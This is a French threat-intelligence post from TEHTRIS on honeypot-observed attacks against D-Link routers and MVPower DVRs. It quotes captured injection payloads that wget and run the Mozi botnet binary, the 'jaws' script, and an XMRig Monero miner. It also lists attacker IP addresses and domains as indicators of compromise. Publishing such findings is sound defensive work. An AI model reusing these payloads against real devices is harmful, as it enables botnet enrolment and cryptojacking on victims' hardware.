Honeypots : Tentative d’exploitation de vulnérabilités sur des objets IoT (semaine 38)

Cette semaine, sur le réseau de TEHTRIS Deceptive Response, notre équipe de Threat Research a détecté des tentatives d’exploitation sur des appareils IoT vulnérables tels que des routeurs D-Link ou des enregistreurs vidéo-surveillance MVPower, dans le but de les enrôler dans des botnets ou de faire du minage de cryptomonnaie.

Sommaire

Tentative d’exploiter des routers D-Link vulnérables

TEHTRIS a observé des activités malveillantes visant à identifier et exploiter des routeurs D-Link vulnérables.

Téléchargement du botnet Mozi

Ces tentatives d’attaque sur des routeurs D-Link exposés pourraient s’inscrire dans une campagne mise en avant par les chercheurs de Palo Alto en août 2022[1], visant à propager MooBot, un variant du malware Mirai s’attaquant aux appareils vulnérables sous Linux. Les appareils compromis deviennent des bots dans une armée de botnet utilisée à des fins malveillantes pour lancer des attaques DDoS.

La requête URL est /HNAP1/. Le header http contient les éléments suivants :

				
					['soapaction: http://purenetworks[.]com/HNAP1/`cd /tmp && rm -rf * && wget http://101.0.32[.]235:58211/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`', 'content-type: text/xml; charset="utf-8"']
				
			
  1. Un champ “soapaction” avec une URL Purenetwork qui sert à exploiter la vulnérabilité
  2. Une séquence de commandes Unix (Linux) pour déclencher les actions suivantes :
    1. cd /tmp : permettant de se déplacer dans le répertoire /tmp (où se trouvent les fichiers temporaires)
    2. rm -rf * : visant à supprimer tous les fichiers localisés dans le fichier courant (/tmp) pour « nettoyer » l’environnement et s’assurer que les étapes suivantes se dérouleront sans encombre
    3. wget http://101.0.32[.]235:58211/Mozi.m : pour télécharger le fichier Mozi.m depuis l’adresse IP de l’attaquant sur le port 58211
    4. chmod 777 /tmp/Mozi.m : permettant de donner les droits d’exécution au fichier Mozi.m
    5. /tmp/Mozi.m : pour exécuter le fichier Mozi.m (un botnet)

Les commandes wget détectées par TEHTRIS font appel aux 34 adresses IP et ports ci-dessous (IoC):

IP

PORT

PAYS

AS

102.33.43[.]180

41657

ZA

AS327782 METROFIBRE-NETWORX

103.177.184[.]238

35708

IN

AS133661 NETPLUS BROADBAND SERVICES PRIVATE LIMITED

103.183.33[.]151

44513

IN

AS133661 NETPLUS BROADBAND SERVICES PRIVATE LIMITED

111.61.154[.]108

52431

CN

AS24547 HEBEI MOBILE COMMUNICATION COMPANY LIMITED

112.248.121[.]159

41418

CN

AS4837 CHINA UNICOM CHINA169 BACKBONE

115.197.16[.]182

56929

CN

AS4134 CHINANET

115.208.130[.]40

56453

CN

AS4134 CHINANET

115.214.105[.]133

52092

CN

AS4134 CHINANET

115.52.21[.]98

36522

CN

AS4837 CHINA UNICOM CHINA169 BACKBONE

117.198.248[.]77

51366

IN

AS9829 NATIONAL INTERNET BACKBONE

117.217.146[.]136

57716

IN

AS9829 NATIONAL INTERNET BACKBONE

117.248.53[.]4

38607

IN

AS9829 NATIONAL INTERNET BACKBONE

117.63.41[.]64

51007

CN

AS4134 CHINANET

120.83.139[.]253

48258

CN

AS17816 CHINA UNICOM IP NETWORK CHINA169 GUANGDONG PROVINCE

121.146.43[.]89

52936

KR

AS4766 KOREA TELECOM

123.10.134[.]251

34082

CN

AS4837 CHINA UNICOM CHINA169 BACKBONE

123.4.76[.]90

38002

CN

AS4837 CHINA UNICOM CHINA169 BACKBONE

124.91.229[.]171

42558

CN

AS4837 CHINA UNICOM CHINA169 BACKBONE

125.43.187[.]57

36302

CN

AS4837 CHINA UNICOM CHINA169 BACKBONE

163.125.14[.]69

44713

CN

AS17623 CHINA UNICOM SHENZEN NETWORK

182.119.203[.]8

33233

CN

AS4837 CHINA UNICOM CHINA169 BACKBONE

2.143.34[.]209

38389

ES

AS3352 TELEFONICA DE ESPANA S.A.U.

200.110.58[.]246

56319

BO

AS27839 COMTECO LTDA

202.164.131[.]68

47322

IN

AS17465 CABLE ISP IN INDIA

210.89.58[.]46

39424

IN

AS133661 NETPLUS BROADBAND SERVICES PRIVATE LIMITED

210.89.58[.]95

46472

IN

AS133661 NETPLUS BROADBAND SERVICES PRIVATE LIMITED

221.5.62[.]248

50039

CN

AS17816 CHINA UNICOM IP NETWORK CHINA169 GUANGDONG PROVINCE

27.45.39[.]192

42667

CN

AS17816 CHINA UNICOM IP NETWORK CHINA169 GUANGDONG PROVINCE

39.74.100[.]178

44354

CN

AS4837 CHINA UNICOM CHINA169 BACKBONE

42.228.194[.]25

45252

CN

AS4837 CHINA UNICOM CHINA169 BACKBONE

42.230.87[.]201

34163

CN

AS4837 CHINA UNICOM CHINA169 BACKBONE

58.46.196[.]9

36279

CN

AS4134 CHINANET

59.92.167[.]106

43448

IN

AS9829 NATIONAL INTERNET BACKBONE

Téléchargement d’un mineur de cryptomonnaie

TEHTRIS a également détecté des tentatives d’exploitation de routeurs D-Link pour télécharger un logiciel de cryptominage.

Le header http contient les éléments suivants :

				
					['accept-encoding: gzip, deflate', 'soapaction: "http://purenetworks.com/HNAP1/GetDeviceSettings/`cd && cd tmp && export PATH=$PATH:. && cd /tmp; rm -rf xmr*; pkill xmrig*; wget https[:]//github[.]com/xmrig/xmrig/releases/download/v6.18.0/xmrig-6.18.0-linux-x64.tar.gz && tar -xvf xmrig-6.18.0-linux-x64.tar.gz && cd xmrig-6.18.0 && screen ./xmrig -o stratum+tcp://randomxmonero.auto.nicehash.com:9200 -u 31pTFN66yAMH2MGnus7fhsTcA4uGJJ2D7J.test -p x -k --nicehash --coin monero -a rx/0; ./xmrig -o stratum+tcp://randomxmonero.auto.nicehash.com:9200 -u 31pTFN66yAMH2MGnus7fhsTcA4uGJJ2D7J.test -p x -k --nicehash --coin monero -a rx/0`"', 'accept: */*', 'connection: keep-alive']
				
			

L’attaquant tente de télécharger le logiciel de cryptominage XMRig depuis GitHub et de miner du Monero.

Les adresses IP ci-dessous ont effectué ces requêtes sur les leurres informatiques de TEHTRIS :

IPCountryAS
 34.159.120[.]11 DEAS396982 GOOGLE-CLOUD-PLATFORM
34.89.116[.]57GB
104.196.255[.]198 US
34.85.144[.]234 US

Ces types de headers (« soapaction: « http://purenetworks.com/HNAP1/GetDeviceSettings/`cd && cd tmp && export PATH=$PATH:. && ») sont utilisés par un module Metasploit et peuvent être personnalisés avec ce que l’on choisit d’y ajouter à la suite. De ce fait, c’est une méthode très connue et facile à employer, même pour des hackers peu qualifiés.

TEHTRIS recommande de mettre à jour vos routeurs D-Link pour patcher les vulnérabilités exploitées dans ce type d’attaques.

Des vulnérabilités de MVPower DVR ciblées par le malware Mirai

Par ailleurs, TEHTRIS a repéré des traces du malware Mirai qui prend le contrôle à distance d’appareils opérés sous Linux. En effet, des requêtes http/HTTPS étaient associées à l’User Agent « Hello, world », spécifique au malware Mirai. 465 adresses IP différentes ont lancé ces requêtes en semaine 38.

La requête suivante a été observée :

				
					/shell?cd+/tmp;rm+-rf+*;wget+185.216.71.192/jaws;sh+/tmp/jaws
				
			
L’attaquant tente d’exploiter une vulnérabilité d’exécution de commande Shell sur les enregistreurs vidéo-surveillance MWPower, ce qui lui permettrait d’exécuter des commandes à distance sur les systèmes vulnérables. Ci-dessous les serveurs malveillants appelés par les commandes wget :
IP / Domain Name PORT Country ADDITIONAL INFORMATION
103.159.64[.]218  –  SG AS395092 SHOCK-1
149.56.32[.]172  CA AS 16276 OVH SAS
158.69.162[.]106 CA AS 16276 OVH SAS
185.10.57[.]10   NL AS 51430 ALTUSHOST B.V.
185.216.71[.]192  NL AS 211252 DELIS LLC   Plus de 170 adresses IP ayant tenté d’exploiter cette vulnérabilité sur les honeypots de TEHTRIS renvoyaient vers ce serveur.
41.216.189[.]209  DE AS 211138 PRIVATE-HOSTING DI CIPRIANO OSCAR   7 adresses IP chinoises ayant mené ces tentatives d’attaques sur les honeypots de TEHTRIS renvoyaient vers ce serveur.
45.124.84[.]209 VN AS 135967 BACH KIM NETWORK SOLUTIONS JOIN STOCK COMPANY
79.110.62[.]227 US AS 211252 DELIS LLC
81.161.229[.]46 US AS 211252 DELIS LLC   Plus de 70 adresses IP ayant mené ces tentatives d’attaques sur les honeypots de TEHTRIS renvoyaient vers ce serveur.
91.122.37[.]169 RU AS 12389 ROSTELECOM
123.97.144[.]204 60082  CN AS 4134 CHINANET
171.125.249[.]180 50882  CN AS 4837 CHINA UNICOM CHINA169 BACKBONE
183.150.97[.]46 48304  CN AS 4134 CHINANET
222.141.40[.]148 42134  CN AS 4837 CHINA UNICOM CHINA169 BACKBONE
27.45.14[.]109 37775  CN AS 17816 CHINA UNICOM IP NETWORK CHINA169 GUANGDONG PROVINCE
41.86.19[.]86 40901  LR AS 37203 LIBTELCO
42.238.249[.]137 40463  CN AS 4837 CHINA UNICOM CHINA169 BACKBONE
46.10.229[.]163 53653  BG AS 8866 VIVACOM
botnet.psscc[.]cn Créé le 2022-06-09   Ce nom de domaine est associé à l’adresse IP 81.161.229[.]46 (AS 211252 DELIS LLC US), considérée malveillante sur de nombreuses bases de données publiques et directement mentionnée dans plus de 70 requêtes détectées cette semaine.
jx.qingdaosheng[.]com Créé le 2022-03-20   Ce nom de domaine est associé à l’adresse IP 156.234.211[.]155 (AS131685 SUN NETWORK HONG KONG LIMITED HK), listée sur des blacklists publiques.
networkmapping[.]xyz Ce nom de domaine est associé à l’adresse IP 20.187.116[.]78 (AS8075 Microsoft Corporation HK) considéré malveillante par plusieurs bases de données publiques.
whitesecurity[.]xyz Créé le 2021-12-12   Ce nom de domaine est associé à l’adresse IP 185.38.142[.]79 (AS47674 NET SOLUTIONS – CONSULTORIA EM TECNOLOGIAS DE INFORMACAO, PT), connu de bases de données publiques pour conduire des activités malveillantes.
TEHTRIS recommande de blacklister les flux entrants des adresses IP mentionnées ci-dessus, ainsi que de constamment effectuer les mises à jour disponibles sur vos objets connectés pour patcher les vulnérabilités.
Cyber or not Cyber ?

Abonnez-vous à la newsletter TEHTRIS.

Une fois par mois, soyez au courant de l’actualité cyber en vous abonnant à la newsletter TEHTRIS.

Pour pousser le sujet

Publications similaires

Cyber or not cyber ?

Une fois par mois, soyez au courant de l’actualité cyber en vous abonnant à la newsletter TEHTRIS.